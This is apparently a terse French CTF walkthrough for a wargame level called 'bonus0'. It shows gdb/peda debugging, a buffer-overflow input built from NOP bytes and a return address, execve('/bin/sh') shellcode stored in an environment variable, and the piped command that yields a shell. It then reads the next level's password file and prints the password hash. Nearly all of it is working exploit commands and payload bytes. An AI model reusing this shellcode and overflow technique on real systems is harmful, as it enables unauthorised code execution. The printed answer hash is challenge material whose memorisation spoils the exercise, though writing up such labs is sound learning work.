Note: Installer peda si cela n'est pas deja fait.

gdb ./bonus0

info function:
-----> Le binaire contient les fonctions main, p et pp.

source /tmp/peda/peda.py
set disassembly-flavor intel
b *0x080485aa

r < <(python -c 'print "\x90" * 4095 + "\n" + "\x90" * 9 + "\xbf\xff\xf7\x25"[::-1]')


A * 20
B * 20
--> segfault.

SHELLCODE (19 bytes):
"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x87\xe3\xb0\x0b\xcd\x80";

export SHELLCODE=`python -c "print '\xbf\xff\xf7\x06'[::-1] + '\x90' * 1000 + '\x31\xc0\x50\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x99\x52\x53\x89\xe1\xb0\x0b\xcd\x80'"`

python -c "print 'A' * 4095 + '\n' + 'A' * 9 + '\x0e\xf7\xff\xbf' + 'A' * 30" > /tmp/file

cat /tmp/file - | ./bonus0

cat /home/user/bonus1/.pass

--> cd1f77a585965341c37a1774a1d1686326e1fc53aaa5459c840409d4d06523c9
